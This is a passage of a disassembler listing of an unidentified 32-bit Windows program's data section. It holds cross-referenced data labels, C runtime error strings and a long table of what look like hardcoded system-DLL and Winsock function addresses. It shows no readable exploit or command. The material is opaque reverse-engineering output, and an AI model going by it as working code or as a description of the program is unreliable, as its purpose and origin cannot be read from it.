off_43B910 dd offset sub_41C917 ; DATA XREF: sub_417D8B+28�w
off_43B914 dd offset sub_41CC34 ; DATA XREF: sub_417D8B+32�w
dd offset sub_42086E
align 10h
dd offset sub_41D4FC
off_43B924 dd offset sub_41D4FC ; DATA XREF: sub_41D552+29�r
dword_43B928 dd 0D2D0920h, 5Dh ; DATA XREF: sub_41D797:loc_41DCFE�o
dword_43B930 dd 5Dh, 0 ; DATA XREF: sub_41D797:loc_41DBEE�o
byte_43B938 db 1 ; DATA XREF: sub_41E92D+E1�r
db 2, 4, 8
align 10h
dword_43B940 dd 3A4h ; DATA XREF: sub_41E92D+2F�o
dword_43B944 dd 82798260h, 21h, 0 ; DATA XREF: sub_41E92D+11D�r
dword_43B950 dd 0DFA6h ; DATA XREF: sub_41E92D+C0�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_43BA30 dd 1 ; DATA XREF: sub_41E92D+3C�o
; sub_41EF44+C�o
dword_43BA34 dd 16h ; DATA XREF: sub_41EF44:loc_41EF79�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_43BB98 dd 0C0000005h ; DATA XREF: sub_41EF44+19�o
; sub_41F0EC+A�r ...
dword_43BB9C dd 0Bh ; DATA XREF: sub_421D69+A�r
dd 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_43BC10 dd 3 ; DATA XREF: sub_41EFAB+58�r
; sub_421C3C+C8�r
dword_43BC14 dd 7 ; DATA XREF: sub_41EFAB+5E�r
; sub_421C3C+CD�r
dword_43BC18 dd 0Ah ; DATA XREF: sub_41F0EC+4�r
; sub_421D69+4�r
dword_43BC1C dd 8Ch ; DATA XREF: sub_41EFAB+82�r
; sub_41EFAB+8F�w ...
dword_43BC20 dd 0FFFFFFFFh, 0A00h ; DATA XREF: sub_419D23:loc_419DE0�o
; sub_41E248:loc_41E2C9�o
dword_43BC28 dd 2 ; DATA XREF: sub_41F885+E�o
; sub_41F885+28�r
off_43BC2C dd offset aR6002FloatingP ; DATA XREF: sub_41F885+FC�r
; sub_41F885+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 424B2Ch, 9, 424B00h, 0Ah, 424ADCh, 10h, 424AB0h
dd 11h, 424A80h, 12h, 424A5Ch, 13h, 424A30h, 18h, 4249F8h
dd 19h, 4249D0h, 1Ah, 424998h, 1Bh, 424960h, 1Ch, 424938h
dd 78h, 424928h, 79h, 424918h, 7Ah, 424908h, 0FCh, 42A3B0h
dd 0FFh, 4248F8h
off_43BCB8 dd offset dword_48A320 ; DATA XREF: sub_41F885+1B�o
; sub_41FA42+55�o
align 10h
dd offset dword_48A320
dd 101h
dword_43BCC8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41FA42+72�o
dd 1000h, 0
dword_43BCD8 dd 3 dup(0) ; DATA XREF: sub_419D23+50�o
; sub_41A8A2+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_43BCF8 dd 3 dup(0) ; DATA XREF: sub_419D23+58�o
; sub_41A8A2:loc_41A8C0�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_43BD28 dd 84h dup(0) ; DATA XREF: sub_41FA42+9B�o
dword_43BF38 dd 2694h ; DATA XREF: sub_41BF55+3�r
; sub_41BFA8+46�r ...
align 10h
dword_43BF40 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_42064E�o
dword_43BF58 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_420664�o
dword_43BF70 dd 7080h ; DATA XREF: sub_41D609+76�r
; sub_42094E+5E�w ...
dword_43BF74 dd 1 ; DATA XREF: sub_41D609+98�r
; sub_42094E+8B�w ...
dword_43BF78 dd 0FFFFF1F0h ; DATA XREF: sub_41D609:loc_41D6BB�r
; sub_42094E+94�w ...
dword_43BF7C dd 545350h, 0Fh dup(0) ; DATA XREF: _2:off_43BFFC�o
dword_43BFBC dd 544450h, 0Fh dup(0) ; DATA XREF: _2:off_43C000�o
off_43BFFC dd offset dword_43BF7C ; DATA XREF: sub_42094E+BA�r
; sub_42094E+D9�r ...
off_43C000 dd offset dword_43BFBC ; DATA XREF: sub_42094E+F4�r
; sub_42094E+11B�r ...
align 8
dword_43C008 dd 0FFFFFFFFh ; DATA XREF: sub_42094E+1D�w
; sub_420BAC+1E�r ...
dword_43C00C dd 0 ; DATA XREF: sub_420BAC:loc_420CE0�r
; sub_420D58+BF�w
dword_43C010 dd 0 ; DATA XREF: sub_420BAC+192�r
; sub_420D58+E0�w
align 8
dword_43C018 dd 0FFFFFFFFh ; DATA XREF: sub_42094E+17�w
; sub_420BAC+26�r ...
dword_43C01C dd 0 ; DATA XREF: sub_420BAC+13A�r
; sub_420D58+EA�w ...
dword_43C020 dd 0 ; DATA XREF: sub_420BAC+1A1�r
; sub_420D58+23�r ...
dword_43C024 dd 0FFFFFFFFh ; DATA XREF: sub_420D58+84�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_43C054 dd 16Dh ; DATA XREF: sub_41D609+2A�r
; sub_420D58+2E�r ...
dword_43C058 dd 0FFFFFFFFh ; DATA XREF: sub_420D58:loc_420DE4�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_43C090 dd 2 dup(0) ; DATA XREF: sub_4220C1+7�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_43C1F0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_4220C1+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh
off_43C34C dd offset off_424D00 ; DATA XREF: _1:00424EDC�o _1:00424FC8�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_43C364 dd offset off_424D00 ; DATA XREF: _1:off_424D90�o
; _1:00424DD0�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_43C384 dd offset off_424D00 ; DATA XREF: _1:off_424DD8�o
; _1:00424E1C�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
dd offset off_424D00
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 8
off_43C3C8 dd offset off_424D00 ; DATA XREF: _1:00424EAC�o
align 10h
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset sub_42086E
align 8
byte_43C3E8 db 0 ; DATA XREF: sub_40144A+1D3�w
; sub_40144A+2D2�o
align 2
word_43C3EA dw 0 ; DATA XREF: sub_40144A+1E3�w
word_43C3EC dw 0 ; DATA XREF: sub_40144A+1E9�w
word_43C3EE dw 0 ; DATA XREF: sub_40144A+1F0�w
byte_43C3F0 db 0 ; DATA XREF: sub_40144A+1F7�w
byte_43C3F1 db 0 ; DATA XREF: sub_40144A+1FE�w
word_43C3F2 dw 0 ; DATA XREF: sub_40144A+204�w
dword_43C3F4 dd 0 ; DATA XREF: sub_40144A+234�w
; sub_40144A+250�w
dword_43C3F8 dd 0 ; DATA XREF: sub_40144A+258�w
byte_43C3FC db 0 ; DATA XREF: sub_40144A+26A�w
byte_43C3FD db 0 ; DATA XREF: sub_40144A+27D�w
word_43C3FE dw 0 ; DATA XREF: sub_40144A+295�w
word_43C400 dw 0 ; DATA XREF: sub_40144A+2A4�w
word_43C402 dw 0 ; DATA XREF: sub_40144A+29C�w
dword_43C404 dd 101h dup(0) ; DATA XREF: sub_40144A+2B9�o
dword_43C808 dd 0 ; DATA XREF: sub_4029E9+9E�o
byte_43C80C db 0 ; DATA XREF: sub_4029E9+36�r
; sub_402ACC+37�r ...
align 10h
dword_43C810 dd 7A5h ; DATA XREF: sub_4030D1+10�w
; sub_4030E8+30�r ...
dd 2 dup(0)
dword_43C81C dd 2 dup(0) ; DATA XREF: sub_403EBA+68�o
dword_43C824 dd 0 ; DATA XREF: sub_40395A+13�o
; sub_40EE72+610B�o ...
dword_43C828 dd 2080Ah ; DATA XREF: sub_404853+8�w
; sub_40494F+2D3�o
align 10h
dword_43C830 dd 2 dup(0) ; DATA XREF: sub_40494F+209�o
dword_43C838 dd 0 ; DATA XREF: sub_4059DB+2A�w
; sub_4059DB+51�r ...
dword_43C83C dd 0 ; DATA XREF: sub_4030E8+AE�r
; _0:004042D4�r ...
dd 2 dup(0)
dword_43C848 dd 0 ; DATA XREF: sub_4071DB+18�r
; sub_40762E+92�w ...
dword_43C84C dd 0 ; DATA XREF: sub_407767+4D�r
; sub_40797F+D9�w ...
dd 3E6h dup(0)
dword_43D7E8 dd 6 dup(0) ; DATA XREF: sub_407767+D2�o
; sub_407767+13B�o ...
dword_43D800 dd 0 ; DATA XREF: sub_407252+82�w
; sub_407252+102�o
dword_43D804 dd 41h dup(0) ; DATA XREF: sub_407252+41�o
dword_43D908 dd 41h dup(0) ; DATA XREF: sub_407252+63�o
dword_43DA0C dd 0 ; DATA XREF: sub_407252+F8�w
; sub_407252+114�r
dword_43DA10 dd 0 ; DATA XREF: sub_407252+52�w
dword_43DA14 dd 0 ; DATA XREF: sub_407252+4D�w
; sub_407252+CF�r
dword_43DA18 dd 20h dup(0) ; DATA XREF: sub_407252+9A�o
; sub_407252+BA�o
dword_43DA98 dd 0 ; DATA XREF: sub_407252+8F�w
dword_43DA9C dd 0 ; DATA XREF: sub_407252+A7�w
; sub_407252+C7�w
dword_43DAA0 dd 0 ; DATA XREF: sub_407252:loc_40737C�r
align 8
dword_43DAA8 dd 0 ; DATA XREF: sub_407252+2D5�w
; sub_407252+32E�o
dword_43DAAC dd 0A2h dup(0) ; DATA XREF: sub_407252+2C3�o
dword_43DD34 dd 41h dup(0) ; DATA XREF: sub_407252+28D�o
dword_43DE38 dd 0 ; DATA XREF: sub_407252+2BA�w
; sub_407252+2E1�r
align 10h
dword_43DE40 dd 0 ; DATA XREF: sub_407252+324�w
; sub_407252+340�r
dword_43DE44 dd 0 ; DATA XREF: sub_407252+2E7�w
dword_43DE48 dd 0 ; DATA XREF: sub_407252+2F4�w
dword_43DE4C dd 0 ; DATA XREF: sub_407252+2B4�w
dd 0
dword_43DE54 dd 0 ; DATA XREF: sub_407252:loc_4075A8�r
dword_43DE58 dd 0 ; DATA XREF: sub_407252+1A1�w
; sub_407252+221�o
dword_43DE5C dd 41h dup(0) ; DATA XREF: sub_407252+163�o
dword_43DF60 dd 41h dup(0) ; DATA XREF: sub_407252+182�o
dword_43E064 dd 0 ; DATA XREF: sub_407252+217�w
; sub_407252+233�r
dword_43E068 dd 0 ; DATA XREF: sub_407252+171�w
dword_43E06C dd 0 ; DATA XREF: sub_407252+1EE�r
dword_43E070 dd 20h dup(0) ; DATA XREF: sub_407252+1B9�o
; sub_407252+1D9�o
dword_43E0F0 dd 0 ; DATA XREF: sub_407252+1AE�w
dword_43E0F4 dd 0 ; DATA XREF: sub_407252+1C6�w
; sub_407252+1E6�w
dword_43E0F8 dd 0 ; DATA XREF: sub_407252:loc_40749C�r
align 10h
dword_43E100 dd 0 ; DATA XREF: sub_4087EE+F�r
; sub_4089E7+12�r
align 8
dword_43E108 dd 80h dup(0) ; DATA XREF: sub_409706+41�o
dword_43E308 dd 200h dup(0) ; DATA XREF: sub_409037+C7�o
; sub_409392+DD�o ...
dword_43EB08 dd 200h dup(0) ; DATA XREF: sub_409037+D6�o
; sub_409392+F4�o ...
dword_43F308 dd 0 ; DATA XREF: sub_409037+86�w
; sub_409209+94�r
dword_43F30C dd 0 ; DATA XREF: sub_409037+A7�w
; sub_40966F+55�r ...
dword_43F310 dd 0 ; DATA XREF: sub_409037+A0�w
; sub_409209+D6�r ...
dword_43F314 dd 0 ; DATA XREF: sub_409037+79�w
; sub_409209+35�r ...
dword_43F318 dd 80h dup(0) ; DATA XREF: sub_40966F+5E�o
dword_43F518 dd 0 ; DATA XREF: sub_409037+93�w
; sub_409209+A2�r
align 10h
dword_43F520 dd 0 ; DATA XREF: sub_409037+E7�o
; sub_409037+103�r ...
dword_43F524 dd 0 ; DATA XREF: sub_409392+17B�w
; sub_409539+107�w
dword_43F528 dd 0 ; DATA XREF: sub_409392+180�w
; sub_409539+10D�w ...
dword_43F52C dd 0 ; DATA XREF: sub_409392+159�w
; sub_40966F+4F�r
dword_43F530 dd 77C72C6Bh ; DATA XREF: sub_4085B3+210�r
; sub_4085B3+21A�r ...
dword_43F534 dd 77EBA994h ; DATA XREF: sub_40981F+65�w
; sub_415188+F5�r
dword_43F538 dd 7622A3F4h ; DATA XREF: sub_40981F+7ED�w
; sub_40981F+862�r ...
dword_43F53C dd 71C45229h ; DATA XREF: sub_40981F+9BA�w
; sub_40981F+A18�r ...
dword_43F540 dd 71C24870h ; DATA XREF: sub_40981F+96C�w
; sub_40981F+9E8�r ...
dword_43F544 dd 77C71BB0h ; DATA XREF: sub_4085B3+D1�r
; sub_40981F+46F�w ...
dword_43F548 dd 77D4808Bh ; DATA XREF: sub_4023A7+EC�r
; sub_4023A7+109�r ...
dword_43F54C dd 71C4502Ch ; DATA XREF: sub_40981F+9AD�w
; sub_40981F+A10�r ...
dword_43F550 dd 77DE801Bh ; DATA XREF: sub_40981F+354�w
; sub_40981F+3A9�r ...
dword_43F554 dd 77DDACABh ; DATA XREF: sub_40981F+3F1�w
; sub_40B8D8+11E�r
dword_43F558 dd 77DE8075h ; DATA XREF: sub_40981F+361�w
; sub_40981F+3B1�r ...
dword_43F55C dd 77DD7496h ; DATA XREF: sub_40981F+3A2�w
; sub_40DCE6+AD�r
dword_43F560 dd 71AB1B7Bh ; DATA XREF: sub_405AF2+115�r
; sub_4084B3+7D�r ...
dword_43F564 dd 77E686CCh ; DATA XREF: sub_40981F+72�w
; sub_40981F+D2�r ...
dword_43F568 dd 71C2498Bh ; DATA XREF: sub_40981F+95F�w
; sub_40981F+9DB�r ...
dword_43F56C dd 77DDAB2Fh ; DATA XREF: sub_40981F+388�w
; sub_40981F+3C9�r ...
dword_43F570 dd 7620E8C3h ; DATA XREF: sub_40981F+83B�w
; sub_40981F+88E�r ...
dword_43F574 dd 77DD23D7h ; DATA XREF: sub_408C26+58�r
; sub_40981F+2A5�w ...
dword_43F578 dd 76214750h ; DATA XREF: sub_40981F+82E�w
; sub_40981F+886�r ...
dword_43F57C dd 77E6D75Bh ; DATA XREF: sub_40981F+B3�w
dword_43F580 dd 7620BD61h ; DATA XREF: sub_40981F+848�w
; sub_40981F+896�r ...
dword_43F584 dd 71AB60C9h ; DATA XREF: sub_407BDE+7E�r
; sub_40981F+52F�w ...
dword_43F588 dd 77EBA6E9h ; DATA XREF: sub_40981F+58�w
; sub_40981F+CA�r ...
dword_43F58C dd 76D62A58h ; DATA XREF: sub_40981F+916�w
; sub_40AF86+11A�r
dword_43F590 dd 76F36EAAh ; DATA XREF: sub_40981F+A66�w
; sub_40981F+A6D�r ...
dword_43F594 dd 77E802FCh ; DATA XREF: sub_40981F+A6�w
; sub_40981F+F2�r
dword_43F598 dd 77C75455h ; DATA XREF: sub_4085B3+119�r
; sub_40981F+462�w ...
dword_43F59C dd 71AB12A7h ; DATA XREF: sub_4075E6+20�r
; sub_40981F+5D8�w ...
dword_43F5A0 dd 71C574FAh ; DATA XREF: sub_40981F+9A0�w
; sub_40981F+A08�r
dword_43F5A4 dd 71AB1746h ; DATA XREF: sub_402688+280�r
; sub_40981F+5CB�w ...
dword_43F5A8 dd 71B28D0Dh ; DATA XREF: sub_402ACC+9A�r
; sub_40981F+B21�w
dword_43F5AC dd 762211EFh ; DATA XREF: sub_40981F+7E0�w
; sub_40981F+84F�r ...
dword_43F5B0 dd 77D902E3h ; DATA XREF: sub_40981F+1B3�w
; sub_40AC20+15�r
dword_43F5B4 dd 71C2FA86h ; DATA XREF: sub_40981F+979�w
; sub_40981F+9F0�r ...
dword_43F5B8 dd 77DE1291h ; DATA XREF: sub_40981F+36E�w
; sub_40981F+3B9�r ...
dword_43F5BC dd 77E2C1B3h ; DATA XREF: sub_40981F+37B�w
; sub_40981F+3C1�r ...
dword_43F5C0 dd 73B81E3Bh ; DATA XREF: sub_4087EE+28�r
; sub_4089E7+2B�r ...
dword_43F5C4 dd 71ABF628h ; DATA XREF: sub_40981F+68E�w
; sub_41547E+D0�r
dword_43F5C8 dd 71AB1836h ; DATA XREF: sub_4010B5:loc_4013E0�r
; sub_401A76:loc_401D1C�r ...
dword_43F5CC dd 77C72889h ; DATA XREF: sub_4085B3+207�r
; sub_40981F+496�w
dword_43F5D0 dd 71C453F8h ; DATA XREF: sub_40981F+9C7�w
; sub_40981F+A20�r ...
dword_43F5D4 dd 77DD5C55h ; DATA XREF: sub_40981F+2B2�w
; sub_40981F+2DE�r ...
dword_43F5D8 dd 77E96645h ; DATA XREF: sub_40981F+7F�w
; sub_40981F+DA�r ...
dword_43F5DC dd 77428B97h ; DATA XREF: sub_40981F+B6E�w
; sub_40981F+B75�r ...
dword_43F5E0 dd 71AB41DAh ; DATA XREF: sub_4010B5+2F�r
; sub_401A76+2F�r ...
dword_43F5E4 dd 762059A3h ; DATA XREF: sub_40981F+807�w
; sub_40981F+872�r ...
dword_43F5E8 dd 71C4A1B4h ; DATA XREF: sub_40981F+986�w
; sub_40981F+9F8�r
dword_43F5EC dd 1F7CD214h ; DATA XREF: sub_40981F+BDF�w
; sub_40981F+C10�r
dword_43F5F0 dd 77D4456Bh ; DATA XREF: sub_4023A7+40�r
; sub_4023A7+63�r ...
dword_43F5F4 dd 76D629BBh ; DATA XREF: sub_40981F+8FC�w
; sub_40981F+910�r ...
dword_43F5F8 dd 1F7B9D96h ; DATA XREF: sub_40981F+BF9�w
dword_43F5FC dd 71AB1740h ; DATA XREF: sub_4010B5:loc_4013AA�r
; sub_40144A+3C�r ...
dword_43F600 dd 7620AFB6h ; DATA XREF: sub_40981F+821�w
; sub_40981F+855�r
dword_43F604 dd 77D5C13Ah ; DATA XREF: sub_4023A7+50�r
; sub_4023A7+78�r ...
dword_43F608 dd 77D45B19h ; DATA XREF: sub_4087EE+3F�r
; sub_4087EE+69�r ...
dword_43F60C dd 71AB157Eh ; DATA XREF: sub_40981F+65A�w
; sub_40981F+786�r ...
dword_43F610 dd 71AB3E5Dh ; DATA XREF: sub_402DD7+20A�r
; sub_4030E8+5E�r ...
dword_43F614 dd 71AB14DCh ; DATA XREF: sub_402688+16E�r
; sub_40981F+549�w ...
dword_43F618 dd 0CC0004h ; DATA XREF: sub_40981F+8BD�w
; sub_40981F:loc_40A0FA�w ...
dword_43F61C dd 77DD590Bh ; DATA XREF: sub_40981F+28B�w
; sub_40981F+2C6�r ...
dword_43F620 dd 71ABD755h ; DATA XREF: sub_407D66+98�r
; sub_40981F+681�w ...
dword_43F624 dd 77DF7311h ; DATA XREF: sub_40981F+30F�w
; sub_40981F+323�r ...
dword_43F628 dd 77DDA2AFh ; DATA XREF: sub_40981F+395�w
; sub_40981F+3D1�r ...
dword_43F62C dd 1F7CD927h ; DATA XREF: sub_40981F+BD2�w
; sub_40981F+C08�r
dword_43F630 dd 76206853h ; DATA XREF: sub_40981F+7FA�w
; sub_40981F+86A�r ...
dword_43F634 dd 77D4932Ch ; DATA XREF: sub_4023A7+FC�r
; sub_40981F+206�w ...
dword_43F638 dd 77D5E310h ; DATA XREF: sub_40981F+18C�w
; sub_40981F+1D2�r ...
dword_43F63C dd 76206B7Fh ; DATA XREF: sub_40981F+814�w
; sub_40981F+87A�r ...
dword_43F640 dd 71AB1444h ; DATA XREF: sub_406C19+244�r
; sub_40981F+606�w ...
dword_43F644 dd 77DD189Ah ; DATA XREF: sub_408C26+18A�r
; sub_40981F+2BF�w ...
dword_43F648 dd 71AB3F8Dh ; DATA XREF: sub_4010B5+6F�r
; sub_40144A+AA�r ...
dword_43F64C dd 77DD5D20h ; DATA XREF: sub_40981F+302�w
; sub_40981F+316�r ...
dword_43F650 dd 71AB1890h ; DATA XREF: sub_405AF2+F9�r
; sub_406C19+1FC�r ...
dword_43F654 dd 77C76B34h ; DATA XREF: sub_4085B3+16�r
; sub_40981F+42E�w ...
dword_43F658 dd 77D5E38Ch ; DATA XREF: sub_40981F+199�w
; sub_40981F+1DA�r ...
dword_43F65C dd 77DDA20Bh ; DATA XREF: sub_40981F+347�w
; sub_40981F+39C�r ...
dword_43F660 dd 76F36EEBh ; DATA XREF: sub_40981F+A73�w
dword_43F664 dd 71AB12A7h ; DATA XREF: sub_4010B5+EB�r
; sub_4010B5+1F9�r ...
dword_43F668 dd 71AB1746h ; DATA XREF: sub_4010B5+87�r
; sub_4010B5+9D�r ...
dword_43F66C dd 77EBA595h ; DATA XREF: sub_40981F+4B�w
; sub_40981F+C2�r ...
dword_43F670 dd 77C7531Dh ; DATA XREF: sub_4085B3+2C�r
; sub_4085B3+38�r ...
dword_43F674 dd 77D4BDCAh ; DATA XREF: sub_40981F+165�w
; sub_40981F+1BA�r ...
dword_43F678 dd 71C3516Ah ; DATA XREF: sub_40981F+9E1�w
; sub_40E5EB+72�r
dword_43F67C dd 71AB32CAh ; DATA XREF: sub_40981F+667�w
; sub_40981F+78E�r
dword_43F680 dd 71AB5690h ; DATA XREF: sub_402688+205�r
; sub_402DD7+23B�r ...
dword_43F684 dd 1F7CB8F8h ; DATA XREF: sub_40981F+BEC�w
; sub_40981F+C18�r
dword_43F688 dd 77EBB1E7h ; DATA XREF: sub_40981F+3E�w
; sub_40981F+BA�r ...
dword_43F68C dd 77DD59F0h ; DATA XREF: sub_40981F+298�w
; sub_40981F+2CE�r ...
dword_43F690 dd 71AB5DE2h ; DATA XREF: sub_405AF2+9E�r
; sub_407BDE+9C�r ...
dword_43F694 dd 71AB3ECEh ; DATA XREF: sub_402688+EB�r
; sub_405AF2+89�r ...
dword_43F698 dd 73B81B0Fh ; DATA XREF: sub_40981F+C63�w
; sub_40EE72+4624�r
dword_43F69C dd 76204E4Dh ; DATA XREF: sub_40981F+85B�w
; sub_40BC4B+205�r ...
dword_43F6A0 dd 0 ; DATA XREF: sub_40981F+112�w
dword_43F6A4 dd 1F7D886Ah ; DATA XREF: sub_40981F+BB8�w
; sub_40981F+BF3�r
dword_43F6A8 dd 71AB12F8h ; DATA XREF: sub_40144A+119�r
; sub_40144A+1A0�r ...
dword_43F6AC dd 77C76551h ; DATA XREF: sub_4085B3+BC�r
; sub_40981F+43B�w ...
dword_43F6B0 dd 77C729E2h ; DATA XREF: sub_4085B3+FB�r
; sub_40981F+47C�w ...
dword_43F6B4 dd 77C7212Fh ; DATA XREF: sub_4085B3+65�r
; sub_40981F+448�w ...
dword_43F6B8 dd 71AB1AF4h ; DATA XREF: sub_402DD7+221�r
; sub_402DD7+249�r ...
dword_43F6BC dd 77D5E303h ; DATA XREF: sub_40981F+1A6�w
; sub_40981F+1E2�r ...
dword_43F6C0 dd 71C4576Ch ; DATA XREF: sub_40981F+9D4�w
; sub_40981F+A28�r ...
dword_43F6C4 dd 77D4702Fh ; DATA XREF: sub_4087EE+53�r
; sub_4087EE+7F�r ...
dword_43F6C8 dd 77E6C0E3h ; DATA XREF: sub_40981F+8C�w
; sub_40981F+E2�r ...
dword_43F6CC dd 71AB1ED3h ; DATA XREF: sub_4010B5+2C2�r
; sub_40144A+2DA�r ...
dword_43F6D0 dd 71B2A381h ; DATA XREF: sub_40981F+B14�w
; sub_40981F+B30�r
dword_43F6D4 dd 77DDA595h ; DATA XREF: sub_40981F+31C�w
; sub_41511D+55�r
dword_43F6D8 dd 77DD22EAh ; DATA XREF: sub_408C26+3F�r
; sub_40981F+27E�w ...
dword_43F6DC dd 773F97B0h ; DATA XREF: sub_40981F+B7B�w
dword_43F6E0 dd 76D67A29h ; DATA XREF: sub_40981F+ABD�w
; sub_40AE02+CE�r
dword_43F6E4 dd 76D674FAh ; DATA XREF: sub_40981F+AB0�w
; sub_40981F+AB7�r ...
dword_43F6E8 dd 71AB3C22h ; DATA XREF: sub_40144A+2E�r
; sub_401D82+55�r ...
dword_43F6EC dd 71AB2BBFh ; DATA XREF: sub_407D66+88�r
; sub_40981F+674�w ...
dword_43F6F0 dd 1F7BA3A9h ; DATA XREF: sub_40981F+BC5�w
; sub_40981F+C00�r
dword_43F6F4 dd 71AB401Ch ; DATA XREF: sub_402688+28D�r
; sub_406C19+250�r ...
dword_43F6F8 dd 71C214BAh ; DATA XREF: sub_40981F+993�w
; sub_40981F+A00�r ...
dword_43F6FC dd 71AB868Dh ; DATA XREF: sub_405AF2+13A�r
; sub_407BDE+B3�r ...
dword_43F700 dd 71AB1A6Dh ; DATA XREF: sub_4010B5+324�r
; sub_40144A+2F0�r ...
dword_43F704 dd 71AB155Ah ; DATA XREF: sub_405AF2+B7�r
; sub_405AF2+39F�r ...
dword_43F708 dd 71B22C25h ; DATA XREF: sub_4029E9+B0�r
; sub_4029E9+C8�r ...
dword_43F70C dd 71AB5A01h ; DATA XREF: sub_4010B5+4F�r
; sub_401A76+4F�r ...
dword_43F710 dd 71B2ACCBh ; DATA XREF: sub_40981F+AFA�w
; sub_40981F+B1B�r
dword_43F714 dd 77E78C17h ; DATA XREF: sub_40981F+31�w
